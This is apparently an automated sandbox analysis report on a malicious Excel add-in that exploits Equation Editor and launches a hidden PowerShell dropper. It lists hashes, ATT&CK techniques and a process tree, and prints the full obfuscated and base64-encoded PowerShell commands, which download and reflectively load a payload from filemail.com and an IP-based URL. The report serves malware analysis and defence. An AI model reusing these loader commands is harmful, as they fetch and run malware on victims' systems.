b95a8f60a0db34e77e88eee9fc34f2f057f31f9eb1bc66fa292cbe7e5e697428

General

Target

b95a8f60a0db34e77e88eee9fc34f2f057f31f9eb1bc66fa292cbe7e5e697428.xlam
Size

620KB
MD5

ce37f3ed03a2664795b50ad1966b81e8
SHA1

34636b9da429754b4c21cae7c78688e4a79040d1
SHA256

b95a8f60a0db34e77e88eee9fc34f2f057f31f9eb1bc66fa292cbe7e5e697428
SHA512

a3e5bef5a8771d3d0b9a7091466128cd1394816bfe0b915b0cb8697715812fa5c94ff4b74f61aca276b29471748710d44a5f9014deeed5ab9c3b8fb25fd7ceb7
SSDEEP

12288:4zsvv6a2wiAeUTeS7djh7XK1hfHIXN7XyU4bozJAYMiiuWcktquW:4pa2DH+djhL0damMaZDhtzW

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
4	1932	EQNEDT32.EXE
6	2776	WScript.exe
7	2776	WScript.exe
9	2688	powershell.exe
10	2688	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2820	powershell.exe
2688	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
1932	EQNEDT32.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	6	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	7	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2976	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2820	powershell.exe
2688	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2820	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2976	EXCEL.EXE
2976	EXCEL.EXE
2976	EXCEL.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1932 wrote to memory of 2776	1932	EQNEDT32.EXE	33
PID 1932 wrote to memory of 2776	1932	EQNEDT32.EXE	33
PID 1932 wrote to memory of 2776	1932	EQNEDT32.EXE	33
PID 1932 wrote to memory of 2776	1932	EQNEDT32.EXE	33
PID 2776 wrote to memory of 2820	2776	WScript.exe	34
PID 2776 wrote to memory of 2820	2776	WScript.exe	34
PID 2776 wrote to memory of 2820	2776	WScript.exe	34
PID 2776 wrote to memory of 2820	2776	WScript.exe	34
PID 2820 wrote to memory of 2688	2820	powershell.exe	36
PID 2820 wrote to memory of 2688	2820	powershell.exe	36
PID 2820 wrote to memory of 2688	2820	powershell.exe	36
PID 2820 wrote to memory of 2688	2820	powershell.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\b95a8f60a0db34e77e88eee9fc34f2f057f31f9eb1bc66fa292cbe7e5e697428.xlam
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2976

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1932
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\eveningmecccmedicallaboratory.vbs"
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQnKyc+JysnPnZmYzsnKyd6WXZlbmRGbGFnID0gdmZjPDxCQVNFNjRfRU5EPj52ZmM7ell2c3RhcnRJbmRleCA9IHpZdmltYWdlVGV4dC5JbmRleE9mKHpZdnN0YXJ0RmxhZyk7ell2ZW5kSW5kZScrJ3ggPSB6WXZpbWFnZVRleHQuSW5kZXhPJysnZih6WXYnKydlbmRGbGFnKTt6WXZzdGFydEluZGV4IC1nZSAwIC1hbmQgell2ZW5kSW5kZXggLWd0IHpZdnN0YXJ0SW5kZXg7ell2c3RhcnRJbmRleCArPSB6WXZzdGFydEZsYWcuTGVuZ3RoOycrJ3pZdmJhc2U2NExlbmd0aCA9IHpZdmVuZEluZGV4IC0gell2c3RhcnRJbmRleDt6WXZiYXNlNjRDb21tYW5kID0gell2JysnaW1hZ2VUZXh0LlN1YnN0cmluZyh6WXZzdGFydEluZGV4LCB6WXZiYXNlNjRMZW5ndCcrJ2gpO3pZdmJhc2U2NFJldmVyc2VkID0gLWpvaW4nKycgKHpZdmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBHb2EgRm9yRWFjaC1PYmplY3QgeyAnKyd6WXYnKydfIH0pWy0xLi4tKHpZdmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ell2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh6WXZiYXNlNjRSZXZlcnNlZCk7ell2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHpZdmNvbW1hbmRCeXQnKydlcyk7ell2dmFpJysnTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh2ZmNWQUl2ZmMpO3pZdnZhaU1ldGhvZC5JbnZva2Uoell2bnVsbCwgQCh2ZmN0eHQuNDU0NDY1NjU0M21tYWRhbWJld2FhYWFhYWFhYXNub2YvOTEuNy44NjEuNDAxLy86cHR0aHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjTVMnKydCdWlsZHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYyx2ZmNkZXNhdGl2YWRvdmZjLHZmY2Rlc2F0aXZhZCcrJ292ZmMsdicrJ2ZjZGVzYScrJ3RpdmFkb3ZmJysnYyx2ZmNkZXNhdCcrJ2l2YWRvdmZjLHZmY2Rlc2F0aXZhZG92ZmMsdmZjMXZmYyx2ZmNkZXNhdGl2YWRvdmZjKSk7JykuUkVQbEFjRSgnR29hJywnfCcpLlJFUGxBY0UoJ3pZdicsJyQnKS5SRVBsQWNFKCd2ZmMnLFtTdFJpbmddW0NoYXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2820
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcMS'+'Buildvfc, vfcdesativadovfc, vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').REPlAcE('Goa','|').REPlAcE('zYv','$').REPlAcE('vfc',[StRing][Char]39))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
4e0b812c7bf0f3a378362c4fc3889da4

SHA1
6ca37f7fa5c98f063eccbf3f0b44e0ec72387d95

SHA256
bb2cb33c34697d6e20953e54fa182a22b8dbfa743c8520c39df3303d1c37dcd9

SHA512
fe50d31d1cb6ed9445f6fde0a0df68f236735bc298d9b5702e453b4e36d4578c66c0ae9f4af0419ad72bcf5f33526beeb41856a7d6aef2afe06240102f9864e3

Download Submit
C:\Users\Admin\AppData\Roaming\eveningmecccmedicallaboratory.vbs

Filesize
12KB

MD5
6b3b1ea168bcffb6331a923fc3d266f8

SHA1
a4c2f31faad3a36f3a8acb383fcefa4563807fb3

SHA256
e8d997d89a442adfb054c842dc67a259df3c8577686a20f8a9c9e7239830815d

SHA512
6ec1e10be33258d2d30160a077b23670643331faed7079c3931961d6e498379c2bd4f6ea244bc90e50cf23a0c7a7e63499c273278c3c3765e06efc55919e3af5

Download Submit
memory/2976-1-0x00000000724CD000-0x00000000724D8000-memory.dmp

Filesize
44KB

Download
memory/2976-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2976-16-0x00000000724CD000-0x00000000724D8000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing